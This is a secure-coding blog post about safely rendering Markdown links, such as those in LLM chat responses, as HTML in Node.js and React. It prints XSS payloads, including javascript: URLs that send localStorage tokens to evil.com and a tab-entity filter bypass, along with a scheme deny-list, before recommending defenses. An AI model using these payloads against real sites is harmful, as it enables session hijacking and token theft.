How to Parse URLs from Markdown to HTML Securely?
2025-01-30 · via NodeJS Security & NodeJS Secure Coding's Blog

Initially, this might sound like a simple question: just use the built-in url module in Node.js to parse URLs, right? Or better yet, use the JavaScript URL object via new URL() and extract the parts you need from there. It might not be as easy as it seems.

Let’s evaluate it based on a real-world scenario that I’ve seen in the wild, specifically in Markdown-based libraries.

Markdown to HTML

One of the most popular use-cases that requires URL parsing is handling Markdown-formatted content and rendering it on a web page, which means translating it into its HTML equivalent.

This use-case is probably more familiar to you now than ever before, due to the rise of LLMs (Large Language Models). These generative text models return structured content in the response payload, and you then need to render it on the page.

To put that use-case example into practical terms, imagine you have the following React component that renders a chat-bot like interface on the page:

return (
  <div className="mt-2 flex w-full flex-row items-start justify-start gap-3">
    <Flex
      ref={messageRef}
      direction="col"
      gap="lg"
      items="start"
      className="min-w-0 flex-grow pb-8"
    >
      <AISelectionProvider onSelect={handleSelection}>
        <Mdx
          message={rawAI ?? undefined}
          animate={!!isLoading}
          messageId={id}
        />
      </AISelectionProvider>
      {stop && (
        <AIMessageError
          stopReason={stopReason ?? undefined}
          message={message}
        />
      )}
      <AIMessageActions message={message} canRegenerate={message && isLast} />
      <AIRelatedQuestions message={message} show={message && isLast} />
    </Flex>
  </div>
);

Practically, the messages are using a library like marked-react to convert the Markdown syntax from the LLM response into HTML as follows:

return (
  <article className={articleClass} id={`message-${messageId}`}>
    <Markdown
      renderer={{
        text: (text) => text,
        paragraph: (children) => (
          <motion.p
            variants={REVEAL_ANIMATION_VARIANTS}
            animate={"visible"}
            initial={animate ? "hidden" : "visible"}
          >
            {children}
          </motion.p>
        ),
        em: renderEm,
        heading: renderHeading,
        hr: renderHr,
        br: renderBr,
        link: (href, text) => renderLink(href, text, messageId),
        image: renderImage,
        code: renderCode,
        codespan: renderCodespan,
      }}
      openLinksInNewTab={true}
    >
      {message}
    </Markdown>
  </article>
);

Parsing Dangerous URLs from Markdown

Ok so we covered the use-case to provide an example of where and why you’ll often need to handle URL parsing from arbitrary strings, be it Markdown or otherwise.

Now imagine what the Markdown content might look like:

[Click here to visit my website](https://lirantal.com)

Or maybe:

<a href="https://lirantal.com">Click here to visit my website</a>

So what stops someone from crafting a malicious URL that makes use of the javascript: protocol scheme to execute arbitrary JavaScript code, which is exactly how we get to Cross-site Scripting (XSS) vulnerabilities?

Imagine the following XSS payload:

[Click here to visit my website](javascript:alert('XSS'))

A Markdown parser might naively copy the URL part verbatim into the equivalent HTML anchor tag:

<a href="javascript:alert('XSS')">Click here to visit my website</a>

What’s in a JavaScript alert('XSS')?

Oh, right. This might not seem dangerous at first glance. What’s in an alert pop-up?

But if, for example, you use JWTs to manage authentication and store them in local storage, then this type of XSS attack can exfiltrate the JWT and hijack the user’s session. Imagine the following:

[Click here to visit my website](javascript:fetch('https://evil.com?token=' + localStorage.getItem('token')))

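I wish it were always that easy. If you’ve been doing web development for a bit you’ve probably been bitten by this little thing called CORS, which can feel like the devil, but let’s not side-track. CORS is a browser security feature that restricts what a page can read from cross-origin responses (requests from one origin (domain) to another, sort of). Strictly speaking, it doesn’t stop a simple GET request like the one above from being sent, and the attacker controls evil.com anyway, so CORS alone won’t save you here. What can stop that fetch() call is a Content Security Policy with a restrictive connect-src directive. So browser security features aren’t really the devil? More like your guardian angel 🪽.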

Game not over though, we can come up with JavaScript code that would create an image tag and set the src attribute to the URL we want to exfiltrate the token to:

[Click here to visit my website](javascript:document.body.appendChild(document.createElement('img')).src='https://evil.com?token='+localStorage.getItem('token'))

Slick, eh? :-)

Anyways, I’m digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!

Parsing a URL in JavaScript

So back to the problem at hand. You get a Markdown link element with a URL of javascript:alert() and now what? Well, maybe you pass it to new URL(), or maybe you manually parse it with a regex pattern to ensure it doesn’t use dangerous protocol schemes like javascript:, right? So you’d have a snippet of code that looks like this:

const unsafeLinkPrefix = [
  'javascript:',
  'data:text/html',
  'vbscript:',
  'data:text/javascript',
  'data:text/vbscript',
  'data:text/css',
  'data:text/plain',
  'data:text/xml'
]

And then you’ll likely have a function that denies any URLs with those protocol schemes that can turn into an XSS attack. Congrats.
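To make that concrete, here is a minimal sketch of what such a deny function often looks like. The isDeniedUrl name and the shortened prefix list are hypothetical, not taken from any specific library, and the next section shows why this approach falls short.

```javascript
// Hypothetical deny-list check, shown only to illustrate the pattern.
// The list is a shortened copy of the unsafeLinkPrefix array above.
const unsafeLinkPrefix = ['javascript:', 'vbscript:', 'data:text/html'];

function isDeniedUrl(url) {
  // Normalize case and surrounding whitespace before comparing prefixes.
  const normalized = String(url).trim().toLowerCase();
  return unsafeLinkPrefix.some((prefix) => normalized.startsWith(prefix));
}

console.log(isDeniedUrl("javascript:alert('XSS')")); // true
console.log(isDeniedUrl('https://lirantal.com'));    // false
```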

Insecure URL Parsing

But what if I told you that denying protocol schemes like that is not enough? 😲

Imagine user input, or a response generated by an LLM that has been tricked, that includes the following URL:

<a href="jav&#x09;ascript:alert('XSS');">Click Me</a>

This might look odd to you, but the browser certainly knows how to interpret it. Your regex pattern matching logic will not catch this attack because the text doesn’t strictly match the string “javascript”, right?

What does it do though? Let’s break it down. First of all, the text &#x09; is an HTML entity. This specific one refers to the horizontal tab character. Each part of the entity has a meaning:

  • & starts the entity reference.
  • # indicates a numeric character reference.
  • x09 is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).
  • ; ends the entity reference.

Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.
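The bypass can be reproduced in Node.js with a small sketch. The decodeNumericEntities helper is hypothetical and only approximates what an HTML parser does to an attribute value (it handles numeric references only and does no range checking). The last line relies on the WHATWG URL parser, which strips tab and newline characters from its input before parsing.

```javascript
// Hypothetical helper: decodes numeric character references such as
// &#x09; or &#9; into the characters they stand for.
function decodeNumericEntities(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => String.fromCodePoint(parseInt(dec, 10)));
}

const rawHref = "jav&#x09;ascript:alert('XSS');";

// A plain prefix check sees nothing suspicious in the raw attribute text.
console.log(rawHref.toLowerCase().startsWith('javascript:')); // false

// After entity decoding, the value contains a literal tab character.
const decodedHref = decodeNumericEntities(rawHref);
console.log(JSON.stringify(decodedHref)); // "jav\tascript:alert('XSS');"

// The URL parser removes the tab, so the scheme comes out as javascript:
console.log(new URL(decodedHref).protocol); // javascript:
```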

How to Securely Parse URLs from Markdown

At this point I think we’ve established the dangers of parsing URLs. So to get on with the positive side of things, let’s talk about patterns and security best practices for properly and securely addressing URL parsing.

The following practices are listed in the order in which I suggest you adopt them to secure your URL parsing logic:

1. Allow-list vs Deny-list

Development paradigms such as maintaining the unsafeLinkPrefix array are a form of a deny-list and that’s often a bad pattern. The reason is that attackers will always come up with novel ways and new tricks to bypass your deny-list and you on the other hand have to keep up with it and maintain it. It’s a losing battle.

So, instead of having a deny-list that includes javascript: and any other protocols you deem dangerous, change perspectives. Work from an allow-list. What is reasonable to allow in a URL for it to be valid in your use-cases?

For example, allow only the https: protocol.
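A minimal sketch of an allow-list check, assuming the URL global available in Node.js and browsers. The isAllowedUrl and ALLOWED_PROTOCOLS names are hypothetical.

```javascript
// Hypothetical allow-list: only the schemes listed here are accepted.
const ALLOWED_PROTOCOLS = new Set(['https:']);

function isAllowedUrl(input) {
  try {
    // The parser lowercases the scheme, so 'HTTPS:' and 'https:' compare equal.
    const { protocol } = new URL(input);
    return ALLOWED_PROTOCOLS.has(protocol);
  } catch {
    // new URL() throws for anything it can't parse as an absolute URL.
    return false;
  }
}

console.log(isAllowedUrl('https://lirantal.com'));    // true
console.log(isAllowedUrl("javascript:alert('XSS')")); // false
console.log(isAllowedUrl('ftp://example.com/file'));  // false
```

Anything that isn't explicitly listed is rejected, so a scheme you never thought about is denied by default instead of slipping through.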

2. Use secure anchor tags

When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all these anchor HTML elements with the attributes rel="noopener noreferrer" and the target="_blank" attribute.

By doing that, the browser will open the URL in a new tab and will not allow the new tab to access the window.opener property, which is a common vector for phishing attacks.
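As a rough sketch, a link renderer that applies these attributes could look like the following. The renderSafeAnchor and escapeHtml helpers are hypothetical, and the sketch assumes the href has already passed your URL validation.

```javascript
// Hypothetical helper: escapes characters that are significant in HTML
// text and attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical renderer: always emits target="_blank" with
// rel="noopener noreferrer". Assumes href was validated beforehand.
function renderSafeAnchor(href, text) {
  return `<a href="${escapeHtml(href)}" target="_blank" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
}

console.log(renderSafeAnchor('https://lirantal.com', 'Click here to visit my website'));
// <a href="https://lirantal.com" target="_blank" rel="noopener noreferrer">Click here to visit my website</a>
```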

3. Secure by default

This practice I specifically want to devote to library authors.

If you’re maintaining a library or a form of 3rd-party dependency that handles the parsing logic you might say that it is not your responsibility to decide whether URLs are opened in the same browsing tab or a new tab, or whether you should also support the ftp:// protocol scheme.

I get you.

But there’s a lot of value in providing a safe, hardened Secure by default approach that guarantees safe security defaults for the absolute majority of users and then building on top of it a way for consumers to opt-out of these safe defaults and change the behavior to allow for more flexibility. At that point, they hopefully consider the security implications of deviating from the default and then make an informed decision (hopefully 😅).
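One way a library could express this is a frozen set of secure defaults that consumers override explicitly. This is only a sketch: the option names and the resolveLinkOptions function are hypothetical and do not describe any real library's API.

```javascript
// Hypothetical option names for an imaginary Markdown link renderer.
const SECURE_DEFAULTS = Object.freeze({
  allowedProtocols: ['https:'],
  openLinksInNewTab: true,
  rel: 'noopener noreferrer',
});

// Consumers get the secure defaults unless they explicitly opt out.
function resolveLinkOptions(userOptions = {}) {
  return { ...SECURE_DEFAULTS, ...userOptions };
}

// Default behavior: https only.
console.log(resolveLinkOptions().allowedProtocols); // [ 'https:' ]

// An explicit, visible opt-out that a code reviewer can question.
console.log(resolveLinkOptions({ allowedProtocols: ['https:', 'ftp:'] }).allowedProtocols);
// [ 'https:', 'ftp:' ]
```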

4. Decode URLs

URLs can be encoded in various ways. For example, the URL https://lirantal.com can be percent-encoded as https%3A%2F%2Flirantal.com. On its own, that encoded form isn’t a valid absolute URL that you can navigate to. However, since this is an article and I’ve no idea how you intend to parse URLs, you may well have a use-case in which you receive URLs in a query string, say https://example.com?redirect=https%3A%2F%2Flirantal.com, and that’s where encoding and decoding URLs comes in handy.

So all that to say, your first step in parsing URLs is to decode them so that you get a normalized URL representation that you can work with.

In technical terms it means:

const decodedUrl = decodeURIComponent(url);
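Note that decodeURIComponent() throws a URIError when the input contains a malformed percent-encoding, so untrusted input is best decoded inside a try/catch. A minimal sketch, with a hypothetical safeDecode helper:

```javascript
// Hypothetical wrapper: returns the decoded string, or null when the
// input contains malformed percent-encoding such as a lone '%'.
function safeDecode(url) {
  try {
    return decodeURIComponent(url);
  } catch {
    return null;
  }
}

console.log(safeDecode('https%3A%2F%2Flirantal.com')); // https://lirantal.com
console.log(safeDecode('%E0%A4%A'));                   // null
```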

5. Sanitize HTML entities and control characters

As we’ve seen in the example of the jav&#x09;ascript:alert('XSS'); URL, you should also take into account that URLs can be crafted with some payloads that you wouldn’t expect such as HTML entities.

Other payloads might use control characters, such as tabs and newlines, to bypass your URL parsing logic.

The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before you consider evaluating it.

Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:

url = url.replace(/&#x([0-9a-f]+);?/gi, '')
  .replace(/&#(\d+);?/g, '')
  .replace(/&[a-z]+;?/gi, '')

Another variation of the above that you may consider is the following all-in-one regex:

url = url.replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '')
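A sketch that builds on the patterns above: it also strips ASCII control characters, and it repeats the removal until the string stops changing, so that a nested payload can't reassemble an entity after a single pass. The stripEntitiesAndControls name and the exact control-character range are assumptions of this sketch.

```javascript
// Same three entity shapes as the patterns above, combined into one regex.
const HTML_ENTITY = /&(?:#x[0-9a-f]+|#\d+|[a-z]+);?/gi;
// ASCII control characters, including tab, newline and DEL (an assumption
// about which characters you want to drop).
const CONTROL_CHARS = /[\u0000-\u001f\u007f]/g;

// Hypothetical helper: removes entities and control characters repeatedly
// until a pass makes no further change.
function stripEntitiesAndControls(url) {
  let previous;
  let current = String(url);
  do {
    previous = current;
    current = current.replace(HTML_ENTITY, '').replace(CONTROL_CHARS, '').trim();
  } while (current !== previous);
  return current;
}

console.log(stripEntitiesAndControls("jav&#x09;ascript:alert('XSS')"));
// javascript:alert('XSS')
console.log(stripEntitiesAndControls("jav&#&#x09;x09;ascript:alert('XSS')"));
// javascript:alert('XSS')
```

The sanitized string now starts with a plain javascript: scheme, which a protocol check can reject. One trade-off to be aware of: the named-entity pattern also matches ordinary query separators, so 'a=1&b=2' becomes 'a=1=2'. Depending on your use-case, you may prefer to use the sanitized string only for the safety decision.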

6. Use the URL parser

Finally, pass the URL to the new URL() function and handle error exceptions.

For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to the new URL() constructor, it will throw an error, because characters such as & and # are not valid in a protocol scheme and the string can’t be parsed as an absolute URL:

let exampleBad = 'jav&#10;ascript:alert(4)'
console.log(new URL(exampleBad))

node:internal/url:806
    const href = bindingUrl.parse(input, base, raiseException);
    ^

TypeError: Invalid URL
    at new URL (node:internal/url:806:29)

Still, you’d probably want to keep the URL sanitization logic in place and also pass the result to the new URL() constructor to confirm it’s a valid URL. Don’t rely on the exception alone: if the entity has already been decoded into a literal tab or newline character, the URL parser strips that character and parses the result as a javascript: URL without complaint.

If you do choose to make use of the URL() constructor web API then you probably want to apply this list of practices in a different order. Meaning, once you’ve decoded the URL, sanitized it and run it through new URL(), you can apply the allow-list logic by checking the protocol scheme via the returned object’s protocol property.
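Putting that order together, a minimal end-to-end sketch might look like this. The toSafeHref name, the https-only allow-list and the choice to return null for rejected input are all assumptions of this sketch, not a definitive implementation.

```javascript
const ALLOWED_PROTOCOLS = new Set(['https:']);
const HTML_ENTITY = /&(?:#x[0-9a-f]+|#\d+|[a-z]+);?/gi;
const CONTROL_CHARS = /[\u0000-\u001f\u007f]/g;

// Hypothetical pipeline: decode, sanitize, parse, then check the allow-list.
// Returns a normalized href, or null when the input should not be rendered.
function toSafeHref(rawUrl) {
  let candidate;
  try {
    // 1. Decode percent-encoding (throws on malformed sequences).
    candidate = decodeURIComponent(String(rawUrl));
  } catch {
    return null;
  }

  // 2. Remove HTML entities and control characters. This is a single pass;
  //    repeat it until stable if nested payloads are a concern.
  candidate = candidate.replace(HTML_ENTITY, '').replace(CONTROL_CHARS, '').trim();

  let parsed;
  try {
    // 3. Let the URL parser validate and normalize the result.
    parsed = new URL(candidate);
  } catch {
    return null;
  }

  // 4. Allow-list check on the parsed protocol scheme.
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

console.log(toSafeHref('https://lirantal.com'));           // https://lirantal.com/
console.log(toSafeHref('https%3A%2F%2Flirantal.com'));     // https://lirantal.com/
console.log(toSafeHref("jav&#x09;ascript:alert('XSS');")); // null
```

Returning the parser's normalized href means the value you render is the same one you validated. Keep in mind that decoding and entity stripping can alter legitimate query strings, so adapt these steps to the kinds of URLs you expect.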